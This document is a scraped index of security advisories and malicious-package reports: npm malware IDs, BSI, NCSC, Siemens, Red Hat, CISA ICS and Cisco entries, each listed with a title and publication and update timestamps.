mal-2024-1290	Malicious code in samplenodejsservice (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:33Z
mal-2024-1281	Malicious code in arkime (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:33Z
mal-2024-1288	Malicious code in lambda-iss-location (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:29Z
mal-2024-1282	Malicious code in blockchain-explorer-api (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:29Z
mal-2024-1294	Malicious code in tari-explorer (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:28Z
mal-2024-1289	Malicious code in monitoring-coverage (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:28Z
mal-2024-1292	Malicious code in sid-client-manager (npm)	2024-04-22T06:08:13Z	2024-04-22T06:08:18Z
mal-2024-1279	Malicious code in djs-log (npm)	2024-04-19T06:26:19Z	2024-04-19T06:26:20Z
mal-2024-1278	Malicious code in somepackage-marksl (npm)	2024-04-18T07:28:45Z	2024-04-18T07:28:46Z
mal-2024-1277	Malicious code in malpac (npm)	2024-04-18T07:28:46Z	2024-04-18T07:28:46Z
mal-2024-1272	Malicious code in @portal-packages/core (npm)	2024-04-17T01:45:53Z	2024-04-18T04:33:54Z
mal-2024-1274	Malicious code in ui-common-components-angular (npm)	2024-04-18T01:15:48Z	2024-04-18T01:15:48Z
mal-2024-1273	Malicious code in metrics-balancer (npm)	2024-04-17T19:28:56Z	2024-04-17T19:28:56Z
mal-2024-1275	Malicious code in @portal-packages/utils (npm)	2024-04-17T01:50:45Z	2024-04-17T01:50:45Z
mal-2024-1276	Malicious code in cz-ifood-conventional-changelog (npm)	2024-04-17T00:00:50Z	2024-04-17T00:00:50Z
mal-2024-1267	Malicious code in commitlint-config-ifood (npm)	2024-04-16T21:55:10Z	2024-04-16T21:55:10Z
mal-2024-1271	Malicious code in web-ar-player (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:29Z
mal-2024-1269	Malicious code in hosted-lenses-ui (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:29Z
mal-2024-1270	Malicious code in snap-orca (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:28Z
mal-2024-1268	Malicious code in bluepurellwalker (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:28Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
wid-sec-w-2025-0132	Linux Kernel: Schwachstelle ermöglicht Denial of Service	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0131	OpenSSL: Schwachstelle ermöglicht Offenlegung von Informationen	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0130	vim: Schwachstelle ermöglicht Denial of Service	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0129	7-Zip: Schwachstelle ermöglicht Codeausführung	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0128	Apache CXF: Schwachstelle ermöglicht Denial of Service	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0123	Red Hat Enterprise Linux und and OpenShift (go-git): Mehrere Schwachstellen	2025-01-19T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0064	Google Chrome / Microsoft Edge: Mehrere Schwachstellen	2025-01-14T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0038	Red Hat Enterprise Linux (iperf): Schwachstelle ermöglicht Denial of Service	2025-01-08T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0020	Google Chrome und Microsoft Edge: Schwachstelle ermöglicht Codeausführung	2025-01-07T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0017	Redis: Mehrere Schwachstellen	2025-01-06T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3630	Python: Schwachstelle ermöglicht Denial of Service	2024-12-08T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3497	Linux Kernel: Mehrere Schwachstellen	2024-11-18T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3463	Python: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2024-11-13T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3251	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service	2024-10-21T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1888	Linux Kernel: Mehrere Schwachstellen	2024-08-20T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1812	Red Hat Enterprise Linux (389-ds-base ldap server): Schwachstelle ermöglicht Denial of Service	2024-08-11T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1761	libTIFF: Schwachstelle ermöglicht Denial of Service	2024-08-05T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1722	Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2024-07-29T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1607	Linux Kernel: Mehrere Schwachstellen	2024-07-14T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1259	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifischen Angriff	2024-05-30T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1235	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe	2024-05-26T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1197	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe	2024-05-21T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1188	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service	2024-05-20T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-0219	libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service	2024-01-25T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1613	libTIFF: Mehrere Schwachstellen	2023-06-29T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1605	libTIFF: Schwachstelle ermöglicht Denial of Service	2023-06-29T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1514	libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service	2023-06-19T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1479	libTIFF: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2023-06-14T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2022-1858	Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Denial of Service	2022-10-25T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2022-0451	Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2021-08-10T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ncsc-2025-0074	Kwetsbaarheden verholpen in IBM Storage producten	2025-03-04T14:14:48.398751Z	2025-03-04T14:14:48.398751Z
ncsc-2025-0073	Kwetsbaarheden verholpen in VMware producten	2025-03-04T14:11:56.959153Z	2025-03-04T14:11:56.959153Z
ncsc-2025-0072	Kwetsbaarheden verholpen in Google Android en Samsung Mobile	2025-03-04T10:15:32.203439Z	2025-03-04T10:15:32.203439Z
ncsc-2025-0071	Kwetsbaarheid verholpen in Zohocorp ManageEngine ADSelfService Plus	2025-03-03T14:11:46.709999Z	2025-03-03T14:11:46.709999Z
ncsc-2025-0070	Kwetsbaarheden verholpen in GitLab	2025-03-03T14:10:30.120360Z	2025-03-03T14:10:30.120360Z
ncsc-2025-0068	Kwetsbaarheden verholpen in Mattermost	2025-02-24T12:04:19.392654Z	2025-02-24T12:04:19.392654Z
ncsc-2025-0067	Kwetsbaarheid verholpen in Exim	2025-02-21T12:54:32.376733Z	2025-02-21T12:54:32.376733Z
ncsc-2025-0066	Kwetsbaarheid verholpen in XWiki	2025-02-21T12:33:24.503983Z	2025-02-21T12:33:24.503983Z
ncsc-2025-0065	Kwetsbaarheden verholpen in Nagios XI	2025-02-21T12:32:41.120020Z	2025-02-21T12:32:41.120020Z
ncsc-2025-0064	Kwetsbaarheden verholpen in IBM Cognos Controller	2025-02-21T08:40:26.849797Z	2025-02-21T08:40:26.849797Z
ncsc-2025-0058	Kwetsbaarheden verholpen in Palo Alto Networks PAN-OS	2025-02-13T09:28:54.459828Z	2025-02-21T08:08:58.513404Z
ncsc-2025-0063	Kwetsbaarheid verholpen in PostgreSQL	2025-02-19T09:11:55.511966Z	2025-02-19T09:11:55.511966Z
ncsc-2025-0062	Kwetsbaarheid verholpen in Juniper Session Smart Router	2025-02-18T14:25:56.916762Z	2025-02-18T14:25:56.916762Z
ncsc-2025-0053	Kwetsbaarheden verholpen in Fortinet FortiSwitch, FortiManager, FortiAnalyzer, FortiOS en FortiProxy	2025-02-12T12:39:02.366846Z	2025-02-18T08:09:48.619964Z
ncsc-2025-0004	Kwetsbaarheden verholpen in SonicWall SonicOS	2025-01-08T09:57:24.409437Z	2025-02-18T08:09:28.652034Z
ncsc-2025-0061	Kwetsbaarheden verholpen in Siemens producten	2025-02-14T08:46:28.240775Z	2025-02-14T08:46:28.240775Z
ncsc-2025-0060	Kwetsbaarheid verholpen in Veeam	2025-02-13T09:48:03.729080Z	2025-02-13T09:48:03.729080Z
ncsc-2025-0059	Kwetsbaarheid verholpen in Fortinet FortiOS	2025-02-13T09:29:35.625977Z	2025-02-13T09:29:35.625977Z
ncsc-2025-0057	Kwetsbaarheden verholpen in GitLab CE/EE	2025-02-13T09:09:26.087113Z	2025-02-13T09:09:26.087113Z
ncsc-2025-0056	Kwetsbaarheden verholpen in Schneider Electric ASCO	2025-02-13T09:07:55.191514Z	2025-02-13T09:07:55.191514Z
ncsc-2025-0055	Kwetsbaarheid verholpen in CrowdStrike Falcon sensor	2025-02-13T08:22:07.880125Z	2025-02-13T08:22:07.880125Z
ncsc-2025-0054	Kwetsbaarheden verholpen in Adobe Commerce en Magento	2025-02-13T06:46:08.560650Z	2025-02-13T06:46:08.560650Z
ncsc-2025-0052	Kwetsbaarheden verholpen in Ivanti Connect Secure en Ivanti Policy Secure	2025-02-12T09:35:30.260596Z	2025-02-12T09:35:30.260596Z
ncsc-2025-0050	Kwetsbaarheden verholpen in Microsoft Office	2025-02-11T19:19:24.863294Z	2025-02-11T19:19:24.863294Z
ncsc-2025-0049	Kwetsbaarheden verholpen in Microsoft Visual Studio	2025-02-11T19:17:58.768578Z	2025-02-11T19:17:58.768578Z
ncsc-2025-0048	Kwetsbaarheden verholpen in Microsoft Azure	2025-02-11T19:17:03.555400Z	2025-02-11T19:17:03.555400Z
ncsc-2025-0047	Kwetsbaarheden verholpen in Microsoft Windows	2025-02-11T19:16:04.610648Z	2025-02-11T19:16:04.610648Z
ncsc-2025-0046	Kwetsbaarheid verholpen in Apple iOS en iPadOS	2025-02-11T09:54:03.266145Z	2025-02-11T09:54:03.266145Z
ncsc-2025-0045	Kwetsbaarheden verholpen in SAP producten	2025-02-11T09:08:48.427126Z	2025-02-11T09:08:48.427126Z
ncsc-2025-0043	Kwetsbaarheden verholpen in Cisco IOS, IOS XE en IOS XR Software	2025-02-07T07:44:34.306225Z	2025-02-11T06:53:00.177478Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ssa-900277	SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-879734	SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-871704	SSA-871704: Multiple Vulnerabilities in SICAM Products	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z
ssa-832273	SSA-832273: Multiple Vulnerabilities in Fortigate NGFW before V7.4.3 on RUGGEDCOM APE1808 devices	2024-03-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-771940	SSA-771940: X_T File Parsing Vulnerabilities in Teamcenter Visualization and JT2Go	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-753746	SSA-753746: Denial of Service Vulnerabilities in SIMATIC WinCC Affecting Other SIMATIC Software Products	2024-02-13T00:00:00Z	2024-06-11T00:00:00Z
ssa-711309	SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products	2023-09-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-690517	SSA-690517: Multiple Vulnerabilities in SCALANCE W700 802.11 AX Family	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-625862	SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-620338	SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-599968	SSA-599968: Denial-of-Service Vulnerability in Profinet Devices	2021-07-13T00:00:00Z	2024-06-11T00:00:00Z
ssa-566905	SSA-566905: Multiple Denial of Service Vulnerabilities in the Webserver of Industrial Products	2023-04-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-540640	SSA-540640: Improper Privilege Management Vulnerability in Mendix Runtime	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-482757	SSA-482757: Missing Immutable Root of Trust in S7-1500 CPU devices	2023-01-10T00:00:00Z	2024-06-11T00:00:00Z
ssa-481506	SSA-481506: Information Disclosure Vulnerability in SIMATIC S7-200 SMART Devices	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-446448	SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack	2022-04-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-407785	SSA-407785: Multiple X_T File Parsing Vulnerabilities in Parasolid and Teamcenter Visualization	2023-08-08T00:00:00Z	2024-06-11T00:00:00Z
ssa-398330	SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1	2023-12-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-353002	SSA-353002: Multiple Vulnerabilities in SCALANCE XB-200 / XC-200 / XP-200 / XF-200BA / XR-300WG Family	2024-03-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-341067	SSA-341067: Multiple vulnerabilities in third-party components in ST7 ScadaConnect before V1.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-337522	SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-319319	SSA-319319: Denial of Service Vulnerability in TIA Administrator	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-238730	SSA-238730: Out-of-Bounds Write Vulnerabilities in SITOP UPS1600 before V2.5.4	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-196737	SSA-196737: Multiple Vulnerabilities in SINEC Traffic Analyzer before V1.2	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-093430	SSA-093430: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager before V3.0	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z
ssa-035466	SSA-035466: Incorrect Permission Assignment in SICAM PAS/PQS	2023-10-10T00:00:00Z	2024-06-11T00:00:00Z
ssa-024584	SSA-024584: Authentication Bypass Vulnerability in PowerSys before V3.11	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
SSA-900277	SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
SSA-879734	SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
SSA-871704	SSA-871704: Multiple Vulnerabilities in SICAM Products	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
rhsa-2025:1746	Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.1.9 on RHEL 7 security update	2025-02-24T00:08:27+00:00	2025-04-25T07:20:48+00:00
rhsa-2025:1747	Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.3.12 security update	2025-02-24T00:08:38+00:00	2025-04-25T07:20:41+00:00
rhsa-2025:0832	Red Hat Security Advisory: OpenShift Container Platform 4.12.72 bug fix and security update	2025-02-06T00:45:40+00:00	2025-04-25T07:20:34+00:00
rhsa-2024:10813	Red Hat Security Advisory: OpenShift Container Platform 4.13.54 bug fix and security update	2024-12-12T02:08:06+00:00	2025-04-25T07:20:31+00:00
rhsa-2025:0014	Red Hat Security Advisory: OpenShift Container Platform 4.12.71 bug fix and security update	2025-01-09T02:15:46+00:00	2025-04-25T07:20:27+00:00
rhsa-2024:0302	Red Hat Security Advisory: Kube Descheduler Operator for Red Hat OpenShift 5.0.0 for RHEL 9:security update	2024-03-06T13:33:21+00:00	2025-04-25T07:20:27+00:00
rhsa-2024:6755	Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.2 security and bug fix update	2024-09-18T11:56:25+00:00	2025-04-25T07:20:16+00:00
rhsa-2024:4118	Red Hat Security Advisory: Red Hat Ceph Storage 5.3 security, bug fix, and enhancement update	2024-06-26T10:05:24+00:00	2025-04-25T07:20:16+00:00
rhsa-2024:0766	Red Hat Security Advisory: OpenShift Container Platform 4.15.0 security update	2024-02-28T08:10:56+00:00	2025-04-25T07:20:15+00:00
rhsa-2024:10523	Red Hat Security Advisory: OpenShift Container Platform 4.14.42 bug fix and security update	2024-12-05T00:33:01+00:00	2025-04-25T07:20:12+00:00
rhsa-2024:4631	Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.15.0 release	2024-07-18T17:11:22+00:00	2025-04-25T07:20:05+00:00
rhsa-2024:3927	Red Hat Security Advisory: Red Hat Ceph Storage 7.1 container image security, and bug fix update	2024-06-13T14:24:58+00:00	2025-04-25T07:20:04+00:00
rhsa-2024:10142	Red Hat Security Advisory: OpenShift Container Platform 4.15.39 bug fix and security update	2024-11-26T11:17:01+00:00	2025-04-25T07:19:59+00:00
rhsa-2024:0741	Red Hat Security Advisory: OpenShift Container Platform 4.13.33 bug fix and security update	2024-02-14T06:34:01+00:00	2025-04-25T07:19:59+00:00
rhsa-2024:1765	Red Hat Security Advisory: OpenShift Container Platform 4.14.21 bug fix and security update	2024-04-18T11:58:59+00:00	2025-04-25T07:19:50+00:00
rhsa-2024:1037	Red Hat Security Advisory: OpenShift Container Platform 4.13.36 bug fix and security update	2024-03-06T14:46:43+00:00	2025-04-25T07:19:48+00:00
rhsa-2024:0682	Red Hat Security Advisory: OpenShift Container Platform 4.11.58 bug fix and security update	2024-02-08T18:42:42+00:00	2025-04-25T07:19:46+00:00
rhsa-2024:1770	Red Hat Security Advisory: OpenShift Container Platform 4.15.9 bug fix and security update	2024-04-16T14:52:58+00:00	2025-04-25T07:19:37+00:00
rhsa-2024:1052	Red Hat Security Advisory: OpenShift Container Platform 4.12.51 bug fix and security update	2024-03-06T00:38:22+00:00	2025-04-25T07:19:35+00:00
rhsa-2024:0664	Red Hat Security Advisory: OpenShift Container Platform 4.12.49 bug fix update and security update	2024-02-08T19:31:18+00:00	2025-04-25T07:19:29+00:00
rhsa-2024:1572	Red Hat Security Advisory: OpenShift Container Platform 4.12.54 bug fix and security update	2024-04-03T06:57:46+00:00	2025-04-25T07:19:24+00:00
rhsa-2024:0946	Red Hat Security Advisory: OpenShift Container Platform 4.13.35 security update	2024-02-28T14:03:56+00:00	2025-04-25T07:19:24+00:00
rhsa-2024:0269	Red Hat Security Advisory: Run Once Duration Override Operator for Red Hat OpenShift 1.1.0 for RHEL 9	2024-02-28T00:20:04+00:00	2025-04-25T07:19:15+00:00
rhsa-2024:0642	Red Hat Security Advisory: OpenShift Container Platform 4.14.11 bug fix and security update	2024-02-07T17:36:34+00:00	2025-04-25T07:19:14+00:00
rhsa-2024:0941	Red Hat Security Advisory: OpenShift Container Platform 4.14.14 bug fix and security update	2024-02-28T00:21:13+00:00	2025-04-25T07:19:12+00:00
rhsa-2024:1464	Red Hat Security Advisory: OpenShift Container Platform 4.11.59 bug fix and security update	2024-03-27T19:51:20+00:00	2025-04-25T07:19:08+00:00
rhsa-2024:0954	Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 10.15.0 security update	2024-02-27T15:16:25+00:00	2025-04-25T07:19:01+00:00
rhsa-2024:0660	Red Hat Security Advisory: OpenShift Container Platform 4.13.32 bug fix and security update	2024-02-07T15:07:37+00:00	2025-04-25T07:19:00+00:00
rhsa-2024:0290	Red Hat Security Advisory: OpenShift Container Platform 4.14.10 bug fix and security update	2024-01-23T20:26:08+00:00	2025-04-25T07:19:00+00:00
rhsa-2024:1449	Red Hat Security Advisory: OpenShift Container Platform 4.15.5 bug fix and security update	2024-03-27T11:18:26+00:00	2025-04-25T07:18:56+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
icsa-25-016-05	Fuji Electric Alpha5 SMART	2025-01-16T07:00:00.000000Z	2025-01-16T07:00:00.000000Z
icsa-25-010-03	Delta Electronics DRASimuCAD (Update A)	2025-01-09T07:00:00.000000Z	2025-01-16T07:00:00.000000Z
icsa-24-191-05	Johnson Controls Inc. Software House C●CURE 9000 (Update A)	2024-07-09T06:00:00.000000Z	2025-01-16T07:00:00.000000Z
icsa-24-058-01	Mitsubishi Electric Multiple Factory Automation Products (Update A)	2024-02-27T07:00:00.000000Z	2025-01-16T07:00:00.000000Z
icsa-24-030-02	Mitsubishi Electric FA Engineering Software Products (Update B)	2024-01-30T07:00:00.000000Z	2025-01-16T07:00:00.000000Z
icsa-25-016-03	Siemens Siveillance Video Camera	2025-01-14T00:00:00.000000Z	2025-01-15T00:00:00.000000Z
icsa-25-014-04	Belledonne Communications Linphone-Desktop	2025-01-14T07:00:00.000000Z	2025-01-14T07:00:00.000000Z
icsa-25-016-04	Siemens SIPROTEC 5 Products	2025-01-14T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-25-016-02	Siemens Industrial Edge Management	2025-01-14T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-25-016-01	Siemens Mendix LDAP	2025-01-14T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-319-07	Siemens Engineering Platforms	2024-11-12T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-284-10	Siemens SIMATIC S7-1500 CPUs	2024-10-08T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-284-01	Siemens SIMATIC S7-1500 and S7-1200 CPUs	2024-10-08T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-256-14	Siemens SIMATIC SCADA and PCS 7 Systems	2024-09-10T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-256-08	Siemens Industrial Products	2024-09-10T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-256-05	Siemens Mendix Runtime	2024-09-10T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-256-03	Siemens User Management Component (UMC)	2024-09-10T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-193-05	Siemens SCALANCE, RUGGEDCOM, SIPLUS, and SINEC	2024-07-09T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-165-12	Siemens SCALANCE W700	2024-06-11T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-102-02	Siemens SIMATIC WinCC	2024-04-09T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-23-348-10	Siemens SIMATIC S7-1500 CPU	2023-12-12T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-23-348-03	Siemens User Management Component (UMC)	2023-12-12T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-23-257-01	Siemens SIMATIC, SIPLUS Products	2023-09-12T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-23-012-08	Siemens S7-1500 CPU devices	2023-01-10T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-22-349-04	Siemens SCALANCE Products	2022-12-13T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-22-104-06	Siemens PROFINET Stack Integrated on Interniche Stack	2022-04-12T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-20-105-08	Siemens KTK, SIDOOR, SIMATIC, and SINAMICS	2020-04-14T00:00:00.000000Z	2025-01-14T00:00:00.000000Z
icsa-24-345-06	Rockwell Automation Arena (Update A)	2024-12-10T07:00:00.000000Z	2025-01-09T07:00:00.000000Z
icsa-25-007-02	Nedap Librix Ecoreader	2025-01-07T07:00:00.000000Z	2025-01-07T07:00:00.000000Z
icsma-24-354-01	Ossur Mobile Logic Application	2024-12-19T07:00:00.000000Z	2024-12-19T07:00:00.000000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
cisco-sa-erlang-otp-ssh-xyzzy	Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server: April 2025	2025-04-22T21:45:00+00:00	2025-04-24T20:20:26+00:00
cisco-sa-webex-app-client-rce-ufymmylc	Cisco Webex App Client-Side Remote Code Execution Vulnerability	2025-04-16T16:00:00+00:00	2025-04-16T16:00:00+00:00
cisco-sa-sna-prvesc-4bqmk33z	Cisco Secure Network Analytics Privilege Escalation Vulnerability	2025-04-16T16:00:00+00:00	2025-04-16T16:00:00+00:00
cisco-sa-nd-unenum-2xffh472	Cisco Nexus Dashboard LDAP Username Enumeration Vulnerability	2025-04-16T16:00:00+00:00	2025-04-16T16:00:00+00:00
cisco-sa-nxos-image-sig-bypas-pqdrqvjl	Cisco NX-OS Software Image Verification Bypass Vulnerability	2024-12-04T16:00:00+00:00	2025-04-07T16:43:32+00:00
cisco-sa-cslu-7ghmzwmw	Cisco Smart Licensing Utility Vulnerabilities	2024-09-04T16:00:00+00:00	2025-04-04T17:44:00+00:00
cisco-sa-meraki-mx-vpn-dos-vnrpdvfb	Cisco Meraki MX and Z Series AnyConnect VPN Denial of Service Vulnerability	2025-04-02T16:00:00+00:00	2025-04-02T16:00:00+00:00
cisco-sa-epnmpi-sxss-gsscpgy4	Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Stored Cross-Site Scripting Vulnerabilities	2025-04-02T16:00:00+00:00	2025-04-02T16:00:00+00:00
cisco-sa-ece-dos-tc6m9gz8	Cisco Enterprise Chat and Email Denial of Service Vulnerability	2025-04-02T16:00:00+00:00	2025-04-02T16:00:00+00:00
cisco-sa-webex-credexp-xmn85y6	Cisco Webex for BroadWorks Credential Exposure Vulnerability	2025-03-04T16:00:00+00:00	2025-04-01T13:40:00+00:00
cisco-sa-sdwan-xss-zq4kpvyd	Cisco Catalyst SD-WAN Manager Cross-Site Scripting Vulnerability	2024-09-25T16:00:00+00:00	2025-03-28T18:38:53+00:00
cisco-sa-iosxr-priv-esc-gfqjxvof	Cisco IOS XR Software CLI Privilege Escalation Vulnerability	2025-03-12T16:00:00+00:00	2025-03-12T16:00:00+00:00
cisco-sa-snmp-dos-sdxnsucw	Cisco IOS, IOS XE, and IOS XR Software SNMP Denial of Service Vulnerabilities	2025-02-05T16:00:00+00:00	2025-03-12T15:22:33+00:00
cisco-sa-tms-xss-vuln-wbtcywxg	Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability	2025-03-05T16:00:00+00:00	2025-03-05T16:00:00+00:00
cisco-sa-nxos-ici-dpojbwxk	Cisco Nexus 3000 and 9000 Series Switches Command Injection Vulnerability	2025-02-26T16:00:00+00:00	2025-02-26T16:00:00+00:00
cisco-sa-n3kn9k-healthdos-eoqswk4g	Cisco Nexus 3000 and 9000 Series Switches Health Monitoring Diagnostics Denial of Service Vulnerability	2025-02-26T16:00:00+00:00	2025-02-26T16:00:00+00:00
cisco-sa-apic-multi-vulns-9ummtg5	Cisco Application Policy Infrastructure Controller Vulnerabilities	2025-02-26T16:00:00+00:00	2025-02-26T16:00:00+00:00
cisco-sa-phone-info-disc-yyxswstk	Cisco Video Phone 8875 and Desk Phone 9800 Series Information Disclosure Vulnerability	2025-02-19T16:00:00+00:00	2025-02-19T16:00:00+00:00
cisco-sa-esa-mailpol-bypass-5nvcjzmw	Cisco Secure Email Gateway Email Filter Bypass Vulnerability	2025-02-19T16:00:00+00:00	2025-02-19T16:00:00+00:00
cisco-sa-broadworks-xss-gdpgj58p	Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability	2025-02-19T16:00:00+00:00	2025-02-19T16:00:00+00:00
cisco-sa-ise-multivuls-ftw9aoxf	Cisco Identity Services Engine Insecure Java Deserialization and Authorization Bypass Vulnerabilities	2025-02-05T16:00:00+00:00	2025-02-10T20:23:50+00:00
cisco-sa-esa-sma-wsa-multi-ykujhs34	Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance Vulnerabilities	2025-02-05T16:00:00+00:00	2025-02-07T19:21:57+00:00
